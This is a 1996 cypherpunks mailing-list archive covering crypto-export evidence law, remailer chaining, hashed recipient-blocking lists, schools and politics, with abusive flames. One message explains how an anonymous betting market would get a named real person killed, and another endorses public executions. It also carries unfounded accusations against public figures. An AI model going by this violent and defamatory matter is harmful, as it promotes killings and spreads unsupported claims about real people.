        good thing you added the <hee hee>

            --half redneck republicans
            --half further right

        clinton, let alone communism, is a fighting word....

        conspiracy theory is live and well.  as far as anyone around
    here is concerned, Waco and Ruby Ridge were to establish a
    need for gun control, militia bans, privacy abridgements, CDA,
    crypto bans, &c.  opinion on the government in the midst of OKC
    and TWA is moving into the positive range --and there is
    absolutely no doubt of Bubba's cocaine habit or the stink of
    Mena airport.

        BTW, the education level is way above the national average;
    not very many dummies out here.  we do have an advantage: BYU is
    $3K/semester for LDS members, and you need 3.7 to 4.0 to get in.

        schools  --if YOU don't support them, you and we don't have
    them!

--
  "God forbid we should ever be 20 years without such a rebellion. . . .
    What country can preserve it's liberties if their rulers are not
    warned from time to time that their people preserve the spirit of
    resistance?. . .The tree of liberty must be refreshed from time to
    time with the blood of patriots and tyrants."
        --Thomas Jefferson, regarding anarchy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gerard D. Cochrane Jr." <gdcochra@utep.edu>
Date: Sun, 29 Sep 1996 19:04:03 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: "Confessing to a felony"
In-Reply-To: <Pine.BSF.3.91.960929015322.6668L-100000@mercury.thepoint.net>
Message-ID: <Pine.HPP.3.95.960929025720.7234C-100000@mail.utep.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Sep 1996, Brian Davis wrote:

> On Fri, 27 Sep 1996, Timothy C. May wrote:
> 
> > At 5:43 PM -0400 9/27/96, Black Unicorn wrote:
> > >On Thu, 26 Sep 1996, Timothy C. May wrote:
> > 
> > >His admission that he used the notebook.  Recovering the notebook and
> > >finding the software.  Interviewing the Customs agent working at the time.
> > 
> > His admission that he used _which_ notebook? Chain of evidence again.
> > 
> > Finding _which_ software?
> > 
> > (As for the Customs agent, I can assure you that my luggage has never been
> > checked upon either leaving the U.S. or entering the U.S. Even if U.S.
> > Customs could figure out who was working at the time I putatively entered
> > the country, and even if he remembered _me_, months later, just what
> > records would he have, and how would they stand up in court?)
> > 
> > Hearing me say I "exported crypto," a hearsay claim, and happening to find
>                                       ^^^^^^^^^^^^^^^
> It is an admission against interest and a confession; it is admissible 
> against the speaker in a prosecution against him for "exporting crypto"
> from a strictly evidentiary standpoint.
> 
> > one or more laptops at my home, weeks or months later, implies nothing. (To
> > make the point graphically, suppose the raiding party finds _several_
> > laptops or notebooks...do they assume _all_ were taken out of the country,
> > or do they pick the one with the most incriminating software on it? Answer:
> > Unless they can _prove_ one of them was used, and that it had not been
> > _changed_ since the putative event (highly unlikely), they cannot simply
> > _assume_ one of them was taken out.
> 
> Your understanding of evidence is inaccurate.  The evidence re the 
> laptop[s] would be admissible and the parties would argue about what it 
> meant.  The jury is entitled to draw common sense inferences.  That might 
> be easy to do in a case in which a defendant has confessed....
> 
> 
>  
> > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not
> > the one I took to Europe."   "Oh, you say this laptop has PGP 5.9 on it?
> > So? I installed it last week. My trip to Europe was last summer.")
> 
> So now you, as your own lawyer (apparently) have decided to take the 
> stand and testify.  Remember that the prosecutor gets to cross-examine 
> you.  Things are about to get ugly.... 
> 
> 
> > 
> > >Considering the headaches required for airline travel today, it's not like
> > >there aren't serious records abound.
> > 
> > Such as? I recall no inspections of my luggage, no inventorying of the
> > serial numbers of my laptops, no inspection whatsoever of my
> > magneto-optical drives (which were in my carry-on luggage, and not even
> > glanced at, in the box they were in). X-rays would not prove what was taken
> > in or out of the country, even if "x-ray escrow" were implemented (which it
> > is not, according to all reports I have heard, and based on some practical
> > limits on storage), I doubt the records of a trip, say, last summer (of
> > '95) could be retrieved and prove that a particular laptop was taken out.
> > Not to mention that the software allegedly taken out might have been on any
> > kind of media, none of them distinguishable with an x-ray machine.
> 
> Circumstantial evidence is admissible if probative of a fact at issue in 
> the case.  Evidence that you took a laptop out of the country is 
> probative of the allegation that you exported crypto using a laptop.
> 
> 
> 
> > >For crying outloud, he admitted to the world that he took the software
> > >out.  I put that in front of a jury and it looks just like the typical
> > 
> > "For crying out loud" is bluster, not legal argument.
> 
> And your understanding of evidence shows a misunderstanding of how the 
> rules of evidence actually work in a courtroom. 
> 
> 
> > >stupid bragging criminal.  Any defense about "I was just kidding" or "The
> > >message was forged" might be interesting, but it will sound like
> > >technical-mumbo-jumbo to a jury.  Yes, it would convince >ME< that was a
> > 
> > Legal proof is still needed. Given only a nebulous statement like "I
> > exported crypto in violation of the ITARs," or "I shipped PGP to Europe,"
> > is not enough for a case even to be brought to trial.
> 
> You are absolutely wrong.  It may not be enough for a conviction, but it 
> will beat a Rule 29 motion (Motion for a judgment of acquittal) and get 
> the case to the jury.
> 
> > (If it reached trial, I would expect a defense attorney to move for
> > dismissal. Absent any evidence that a crime occurred, absent any proof
> > beyond the nebulous hearsay statement of a "braggart," there is simply no
> > basis for criminal action.)
> > 
> > "Stupid bragging criminals" may be common, but bragging is not in and of
> > itself illegal. There still has to be evidence of a crime.
> 
> Must a jury believe that you were "just bragging" because you now, in a 
> criminal trial, say that you were? 
> 
> 
> > "Produce the body."
> 
> Perry Mason is only active in re-runs.
> 
> > 
> > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the
> > body, or witnesses, does this mean I'll be found guilty? To use BU's
> > phrasing, "for crying out loud.")
> 
> That's where prosecutorial discretion comes in and a judge's and jury's 
> common sense comes in if the prosecutor runs amok.
> 
> BTW, I am far more willing to believe you were bragging about whacking 
> Jimmy Hoffa than about exporting crypto.  Think of all the interesting 
> evidence from this mailing list's archives that prosecutors would attempt 
> to introduce against you ...
> 
> Not to say that *I* couldn't get you off, but not the way you propose.
> 
> EBD
> 
> 
> 
> > --Tim May
> > 
> > We got computers, we're tapping phone lines, I know that that ain't allowed.
> > ---------:---------:---------:---------:---------:---------:---------:----
> > Timothy C. May              | Crypto Anarchy: encryption, digital money,
> > tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> > W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> > Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> > "National borders aren't even speed bumps on the information superhighway."
> > 
> > 
> > 
> > 
> > 
> 


YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT..
YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE
FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY
TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE
YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erp <erp@digiforest.com>
Date: Sun, 29 Sep 1996 19:54:41 +0800
To: cypherpunks@toad.com
Subject: Cryptography..
Message-ID: <Pine.LNX.3.91.960929030258.13020B-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain


What is the maximum encryption allowed to be created.  With export 
restrictions in mind, and without export restrictiosn in mind...
Thanks...
By WORLD and US standards please...
much appreciated..
export from the US to elsewhere that is also..
reply asap is much appreciated




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 18:12:59 +0800
To: cypherpunks@toad.com
Subject: RE: Looking for Qualified Individual/Firm to Contract for Cryptanalysis
In-Reply-To: <01BBAD88.C073E980@geeman.vip.best.com>
Message-ID: <P6a1uD64w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"geeman@best.com" <geeman@best.com> writes:

> Huh?
> Since when is (408) in San Diego?

San Jose then. San something or other. Silicon Valley.
I dislike California enough to view it as one undifferentiated nasty blob.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 18:02:45 +0800
To: cypherpunks@toad.com
Subject: [AP] Afghanistan
Message-ID: <kkc1uD66w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Afghanis publicly hanged their former president, Najibullah [no last name].
Other countries should follow their example.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 18:41:44 +0800
To: cypherpunks@toad.com
Subject: Re: GPS
In-Reply-To: <199609290407.VAA20249@dfw-ix3.ix.netcom.com>
Message-ID: <DPc1uD67w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
> >I think figuring out a way to turn off A/S and getting accurate GPS on
> >commercial equipment at all times would make a nifty Cypherpunks project
> >- if it really involves breaking some encryption.
>
> Essentially the A/S works by having the publicly-readable signal
> contain fuzz fuzz in the low-order bits and the encrypted signal contain
> the real stuff; if they've done decent encryption, you won't crack it.

Do we know for sure that they've got decent encryption?

Aircraft aren't the only market for GPS.

There's a fad to put GPS in cars - it's already very common in Japan, and
Americans are catching up. They're used in conjunction with computerized
road maps. Here improving the accuracy of one's position on the map might
make for a very successful commercial product.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 29 Sep 1996 19:19:34 +0800
To: cypherpunks@toad.com
Subject: Re: What about making re-mailers automatically chain?
Message-ID: <199609290914.EAA09458@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: gcg@pb.net, cypherpunks@toad.com
Date: Sun Sep 29 04:06:38 1996
> Would it be a good idea to have a re-mailer "randomly" decide whether
>  to
> send the mail to the destination or to another re-mailer.  If all
> re-mailers performed this way, not even the sender would know the path.
> The chain could be short sometimes and long others.  Granted, there is
>  a
> possibility that every mailer decides to chain instead of sending the
> message to the recip, but some clever counter tag could keep the number
>  of
> links to a certain maximum.  The "randomness" of this would aid in
>  traffic
> analysis, and of course each mailer that decides to chain the mail
>  would
> encrypt under the next mailer's pub key.  Any thoughts?

I dunno about that one.  Even if the message itself is encrypted,
every remailer has to have the address of the final recipient for
your plan to work.  And if you have cleartext for that message
(oops!) then any remailer operator could read it.  More traffic
is of course a good thing, but I'm just kinda iffy on the concept.

dave



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Madness takes its toll . . . please have exact change ready."
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMk48IzVTwUKWHSsJAQEMugf5AYs0epJSF5ukk5aKvttFXJTHnBzvCtQH
aCgxJnnv6bQGQm2fu8Ot7C9UgFNE8NTHJaPHFAkR21/YgwvhUUNhbUrHgz5zZMJ1
oY3jJJgIyLJsyw/+bsHHQc9oDl5VBr+V8xVQBWNR45N0vHx6wWwH5ZjmhBHEfJcg
97CDvygXh6nYJKQplRJ49wYYT29PMg0dONrQSXtYcH5sAhtPEkTzgIKqg0O3MVen
tGG11Vl+0ghK2RIwJCoWKMXsqmJexP06+5AdeOLwHsc0QmPkuweKMvWSkF1R0ubR
chHFaGlmduT0zNyGB4gIiWl71DYA2EgGSbxOZaGtEa57gJ8tFHVl1g==
=PVbP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 18:51:10 +0800
To: cypherpunks@toad.com
Subject: Re: Technical difficulties with AP [AP NOISE]
In-Reply-To: <199609290407.VAA20253@dfw-ix3.ix.netcom.com>
Message-ID: <mVc1uD68w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
...
> 2) Assassin leaves physical evidence at the scene which the news media
>         would be likely to report, which payee confirms with escrow
>         agent, presumably committing in advance (e.g. after the event,
>         the payee sends a key which allows the escrow agent to decode
>         the encrypted message that said "I'm leaving a note on the body
>         saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767'
>         Works fine for the first couple of assassinations, but after a while
>         the police will catch on and stop revealing kinky details to the medi
...

I don't think it matters who the actual assassin is. Re-read Jim's essay.

Let's suppose Tim May, the notorious deranged psychipath, wants my pal Ether
Dyson dead. Tim May places a bet with a bookie that Ether Dyson lives for
another year, affecting the odds. A horde of potential assassins see that the
odds have changed, and place bets of their own that she won't live for another
year. Then they all try to nail her. If one of them succeeds, then everyone who
bet against Tim May has won, and it doesn't matter which one nailed her.

After the hit, the pigs would likely want to look at the list of people who
bet one way or the other, which is why the communications with the bookie
should be anonymous.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 29 Sep 1996 14:41:59 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: active practice in America
In-Reply-To: <199609290133.UAA00319@smoke.suba.com>
Message-ID: <199609290438.WAA23813@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199609290133.UAA00319@smoke.suba.com>, on 09/28/96
   at 08:33 PM, snow <snow@smoke.suba.com> said:


A Person going by the name Attila said:


>         to put it another way: in criminal procedings: I would rather

>be considered guilty, until proven innocent; than I would be

>presumed innocent, until proven guilty beyond a reasonable doubt.


     If you were the person being _tried_ for a crime, you would rather have

to prove that you COULDN'T POSSIBLY have commited the crime as opposed to

having to have the government PROVE that you DID DO it?



        you bet --the objective of the defense is to cast aspersions
    on the government prosecuters --in other words, create that
    doubt.  you do not need to prove your innocence unconditionally,
    just "taint" the prosecuter a bit.  however, in many cases you are
    guaranteed a trial by a jury of your peers.

        as for peers --look at OJ, and the reverse weighting of the
    Santa Monica jury v. downtown.


>    a nation whch can base a conviction on conspiracy to commit a

>crime, or permits circumstantial evidence to close the gap towards

>'beyond a reasonable doubt,'  has lost any pretense of understand-

> ing the heritage of common law: the Magna Carta.


      Of that, there is no denying.

        the example I have always used:

            three men were drinking in a bar across the street from a
        ripe looking bank.  they sit there and plot a knockoff.  one
        gets stinking drunk and passes out on the floor.  the other
        two go across the street to be arrested for the attempted
        heist.
            the police arrest the drunk on the floor. why?
            "conspiracy to commit the crime!"  and the penalty is the
        same: 7-20 years in the federal slam.

            --unless you are socially disadvantaged and claim heroin
        addiction; then you make it to the street in as little as 18
        months and wipe the tail within 7 years, not 20.  the rule was
        the offender must be less than 25, it may have been raised.

            or, you could hire an expensive member of the boys' club
        and might trade someone elses body for your freedom....

        that's justice in Amerika, folks!   you like it, right?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 29 Sep 1996 20:38:24 +0800
To: "Gerard D. Cochrane Jr." <gdcochra@utep.edu>
Subject: Re: "Confessing to a felony"
In-Reply-To: <Pine.HPP.3.95.960929025720.7234C-100000@mail.utep.edu>
Message-ID: <Pine.BSF.3.91.960929064457.22117A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Sep 1996, Gerard D. Cochrane Jr. wrote:

> On Sun, 29 Sep 1996, Brian Davis wrote:
> 
> > On Fri, 27 Sep 1996, Timothy C. May wrote:
<deletia>
> 
> YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT..
> YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE
> FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY
> TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE
> YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS.


Charming.  A juvenile refugee from alt.2600...

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Oct 1996 03:36:45 +0800
To: cypherpunks@toad.com
Subject: LII FYI: NETDAY PRESS CONFERENCE (fwd)
Message-ID: <v03007801ae74042f46b8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Hang on to your wallets, everyone.

Your tax dollars at work...

Cheers,
Bob Hettinga

--- begin forwarded text


Date: Thu, 26 Sep 1996 16:05:27 -0700 (PDT)
From: Peter Marshall <rocque@eskimo.com>
To: lii@pobox.com
Subject: LII FYI: NETDAY PRESS CONFERENCE (fwd)
MIME-Version: 1.0
Sender: owner-lii@majordomo.pobox.com
Precedence: bulk
Reply-To: lii@pobox.com


---------- Forwarded message ----------
Date: Thu, 26 Sep 1996 08:42:11 -0400
From: Roanne Robinson <RROBINSON@ntia.doc.gov>
Reply-To: roundtable@cni.org
To: Multiple recipients of list <roundtable@cni.org>
Subject: NETDAY PRESS CONFERENCE


The following is a media advisory regarding today's NetDay96 press
conference taking place at Hine Junior High School in southeast D.C.
If you have any questions about the press conference or NetDay96,
please don't hesitate to contact me.  You also can find further
information about NetDay96 by visiting NTIA's home page at

   www.ntia.doc.gov.

Roanne Robinson
National Telecommunications and Information Administration
U.S. Department of Commerce
<rrobinson@ntia.doc.gov>


-----------------------------------------------------------------------------

For Immediate Release:                         Contact:  Paige Darden
September 25, 1996                                        202-482-1551




***** MEDIA ADVISORY RE LAUNCH OF NATIONAL NETDAY *****

WASHINGTON, DC -- U.S. Government officials are joining business and
community leaders in kicking off national NetDay 96 to wire all K-12 public
and private schools in more than 40 states for access to the information
superhighway.  Businesses, parents, educators, students and
community volunteers will come together to wire more than 20,000
schools nationwide.

     Larry Irving, assistant secretary of Commerce for
communications and information, will join U.S. Education Secretary
Richard W. Riley to help lauch national NetDay 96.  Irving's remarks will
focus on the need to make sure that all of America's communities
participate in this effort.  "We can't afford to leave some of our schools
behind -- all of our children deserve access to the tools that will enable
them to be full participants in the Information Age," said Irving.

     WHO:     U.S. Secretary of Education Richard W. Riley
              Assistant Secretary of Commerce Larry Irving
              NetDay Co-Founder John Gage of Sun Microsystems
              Robert Goodwin, Points of Light Foundation
              Corporate Partners, including BellSouth, Cisco Systems,
                  MCI, Apple, AT&T, and others.

     WHEN:   Thursday, September 26, 1:15 p.m.

     WHERE:  Hine Junior High School
             8th Street and Pennsylvania Avenue, SE

     Like California NetDay, national NetDay 96 will follow the classic
barn-raising tradition.  It will build on California NetDay, in which more
than 20,000 volunteers came together in March 1996 to connect over
2,600 schools to the Internet.

     For more information, please call Anna Erdreich, U.S. Department
of Education, 202-401-4389, or Paige Darden, Department of Commerce's
National Telecommunications and Information Administration (NTIA), at
202-482-1551.

                               ###

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Oct 1996 03:30:10 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Workers, Public Schools, Tradesmen, and Justice
In-Reply-To: <v03007800ae71e5a92653@[207.167.93.63]>
Message-ID: <v0300780aae74076a08fb@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:26 pm -0400 9/28/96, snow wrote:
>      I see no reason that general programming shouldn't be considered a
> trade. Maybe more "pure" math than a carpenter, or a mechanic, but they
> don't need the english, general history, & etc. that other "academic"
> careers need.

I have to say I agree with this. I know more than a few kids in my
neighborhood who are more than smart enough, if they got over their
technophobia and a little innumeracy. They could make more than the average
drug dealer's lookout if they were to learn to code.

Unfortunately, all the "trade" schools around here teach you to replace
boards rather than hack code.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 29 Sep 1996 17:58:02 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: Public Schools
In-Reply-To: <19960929061014609.AAA180@GIGANTE>
Message-ID: <199609290816.CAA26768@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <19960929061014609.AAA180@GIGANTE>, on 09/28/96 
   at 11:11 PM, Adamsc@io-online.com (Adamsc) said:

-On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote:

-> attila wrote:
->>        a very unusual situation  --but I live in rural southern utah    
->>where the regional middle school of 1200 can support 4 bands, the 
->> top 2 being very impressive, and provide full AP classes, and ACT

->Wow! Utah is teaching AP?  Is Jim Bell being brought in as a Special
->Lecturer? (I knew Idaho has special Militia classes, but to hear that Utah is
->now teaching Assassination Politics is pretty impressive.)

-Now, ignoring the humorous parts, wouldn't that be a scary thought?  Pro-AP
-high school students?  I could just imagine the death toll rising as the
-"popular" students are knocked off by jealous rivals,  as the dumped
-[boy/girl]friend gets even, etc.  It'd be hard for any non-homeschooled
-student to live to 18.

        considering our history of persecution, and our acceptance of
    the bloody marches across America, driven my mobs --I doubt you
    could get an Jim Bell AP movement going.  despite the fact the
    Federal army (an entire army) occupied Utah for almost 50 years
    and the U.S. refused statehood for almost 50 years, everyone is
    still basically very patriotic.

        yeah, as a humourous thought for the theatre of the absurd, 
    active AP might be ideal in NYC, LA, Chicago, Detroit, Cleveland,
    Buffalo, and the District of Columbia with surrounding regions.
    let them clean themselves up for 9 cents a pop.  

        can't you just see Marion Barry on his knees begging for his
    life, promising to keep you in crack heaven!?

- "That's our advantage at Microsoft; 
-   we set the standards and we can change them."
-       --- Karen Hargrove, Microsoft 
-           (quoted in the Feb 1993 Unix Review editorial)
-
        and, if this is not the gawd-awful truth, I must have just got
    off the bus...  typical, typical MS arrogance. 
        a toast! a toast to their early demise!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Sep 1996 02:27:35 +0800
To: cypherpunks@toad.com
Subject: Re: What about making re-mailers automatically chain?
In-Reply-To: <199609290914.EAA09458@bluestem.prairienet.org>
Message-ID: <v03007803ae7460fd8b9a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:14 AM -0500 9/29/96, David E. Smith wrote:

>I dunno about that one.  Even if the message itself is encrypted,
>every remailer has to have the address of the final recipient for
>your plan to work.  And if you have cleartext for that message
...

Actually, as I read the original proposal, it was to only _insert_
additional links. Thus, imagine the following remailer chain, with Alice
sending to Zeke  through a chain, represented in parentheses (like LISP):

Bob(Charles(Dora(Ed(Frank(........Zeke))))....)

(All messages are encrypted, etc.)

Now, imagine that Charles elects to add two additial chains, XXXX and YYYY
(to make them stand out in my representation). From his point on, the chain
will look like:

(XXXX(YYYY(Dora(Ed(Frank(........Zeke))))....)

Likewise, any of the later remailers can add more links, etc.

Some dangers are that "lost Dutchman" messages will remain in the system
forever. This gets fixed by probablistic criteria, to produce convergence.
Or with digital postage, which causes convergence for ontological reasons.

Adding new links, or adding "middleman" links, is always possible. We've
had several discussions of this over the years.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 02:18:35 +0800
To: cypherpunks@toad.com
Subject: Re: Making Remailers Widespread [REMAILERS]
In-Reply-To: <199609290623.XAA25604@dfw-ix3.ix.netcom.com>
Message-ID: <soR1uD70w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
> >Unfortunately, one-way remailers have much fewer uses than two-way remailers
> >any many of these uses are abusive.
>
> I agree, it's a problem; the return address seems to reduce abuse.

It's not only a question of traceability... Most "useful" uses of Julf's
remailer involved scenarios like someone posting anonymously to a public
forum and soliciting replies, or someone contacting another party
anonymously and wanting to receive a reply. It was pretty easy for two
anonmous parties to establish a dialog. An optional reachable return address
(even if the sender can't be traced back and be punished for abuse) makes
the system so much more useful for things other than anonymous farting.

> >> - A centralized block list (e.g. http://www.remailer.net/block.txt)
> >> which all of the form-based remailers could load and reference would
> >> allow non-picky operators not to have to handle it themselves
> >A single centralized point of failure is bad. Maybe 4 or 5 redundant ones.
> >A blocking request sent to one will be replicated in the other automatically
>
> Good point.  A bit tough to implement in a no-brainer out-of-the-box remailer
> you gain a bit by having the block list point to an address that's really
> a round-robin DNS spinner of some sort, but that still leaves you with
> centralization.

How about: maintain a list of trusted blocking-list sites (comparable to the
list of remailers used for chaining) and when it comes the time to update the
local copy of the blocking list, ask a random one on the list; if it's down,
ask another random one on the list. There may even be more than one list. :-)

> >>         - special-case for "postmaster", who may want to block
> >>                 all of foo.domain instead of just postmaster@foo.domain
> >>         - special-special-case for postmasters of big sites, e.g. aol, net
> >>                 who we may want to ignore?
>
> >I don't think it's a good idea to suport blocking receivers in an entire
> >domain, like *@aol.com. Just say it's not supported.
>
> Blocking an entire domain like *@aol.com is mostly bad.
> Blocking an entire domain like *@myconsultingfirm.com is fine.

I think it's also bad, but I suppose the market wants it, so I'm showing
below how this can be done.

> >> - A sender-blocking list is harder, and may still take human attention
> >I don't think it's a good idea to support sender blocking at all.
>
> There are some spammers you'd like to stop quickly when a Spam Event
> is happening.  There are broken email gateways that may need blocking.
> There are known abusers you might want stopped.  And there are folks like
> president@whitehouse.gov who can be presumed to be forgeries :-)
> A sender-blocking list administered by the Remailer Cabal* would be
> a reasonable default for no-brainer remailers, and obviously it
> should be possible for remailer-admins to override or ignore if they want.

With most ISP's it's trivial to forge one's From: header in SMTP.
Switching to another dime-a-dozen throwaway account is also trivial.
Just admit that you can't block senders, and don't pretend that you
can - false pretenses destroy one's credibility.

Timmy the pathological liar posted a rant a few weeks ago on how
"remailer operators can't be choose" - usually he's full of shit, but
that time he had a point - he must have plagiarized it.

> >Would the receiver blocking list be available to everyone to view? That
> >sounds like a violation of privacy. Someone suggested on this list that
> >(assuming that the entires are addresses that match exactly, not regular
> >expressions), one can store hashes of addresses.
>
> That's worth doing, or at least thinking about seriously.
> The most interesting regular expressions are *@domain (which you can
> handle by keeping separate block lists for domains and full addresses
> (or a merged list that the using remailer checks both)) and
> *@*.domain and user@*.domain - e.g. alice@mailserver17.big-isp.com,
> which would successfully deliver mail to alice@big-isp.com.
> Perhaps the system needs to keep two hashes - hash(alice),hash(big-isp.com)
> and check subsets of the domain name?  This is creeping featurism,
> but it may be the right way to go to set a good precedent.

I think I see a way to accomplish this without too much trouble.
When an e-mail is directed at u@c4.c3.c2...c1, the code that checks
for blocking will search for the following records in the blocking list:

u@c4.c3.c2...c1     (exact match)
*@c4.c3.c2...c1     (replace user by *)
u@*.c3.c2...c1      (replace leftmost .-separated piece of domain by *)
*@*.c3.c2...c1      (both)

and repeat until there are only 2 components left in the domain name.

E.g., if a message is addressed to dlv@under.bwalk.dm.com, the blocking
code would compute hashes of the following strings and check for each one's
presence in the blocked list:

dlv@under.bwalk.dm.com
*@under.bwalk.dm.com
dlv@*.bwalk.dm.com
*@*.bwalk.dm.com
dlv@*.dm.com
*@*.dm.com

and here we stop. This shouldn't take much more CPU time than the blocking
code in Lance Cotrell's mixmaster that I just looked at, which loops though
all blocking patterns and checks if each one matches.

Now, the question is, who would be allowed to add records containing
'*' to the blocking list using the cookie protocol? I suggest that it be
one of the contacts listed in Internic's database.

E.g. joe@some.place.com can add himself to the blocking list using the
cookie protocol. If joe tries to add *@*.place.com to the blocking list,
the 'bot looks at Internic's database and sees only jim and jeff listed
for place.com, so it refuses. On the other hand, jim@some.place.com can
add *@*.place.com, joe@*.place.com, etc, because Internet says he's the
admin for place.com.

Thus a blocking record for cypherpunks@toad.com could be added by
anyone listed in toad.com's Internic entry. There's no need for any
Remailer Cabal [tinc] to maintain blocking lists.

One other suggestion: instead of storing one bit of information (the
address is on the list or not), why not have several flag bits.

E.g., the blocking list could contain records similar to:

hash - e.g. 160-bit SHA
flags - e.g. reserve 32 bits

If the list is sorted by hash, then using binary search to check whether a
value is in it is very fast (much faster than matching wildcards). But at
the same time you can retrieve the flags word, which could be used, e.g.,
to say that an address doesn't wish to block all inciming anonymous
e-mail, but only e-mail that appears not to contain a reply block, or
whatever other preferences can be stuffed into 32 bits.

E.g., one could use 2 or 3 bits to specify the maximum size of a message
to be delivered to addresses matching this pattern: 000 for no limit,
and nnn for nnn*4K bytes.

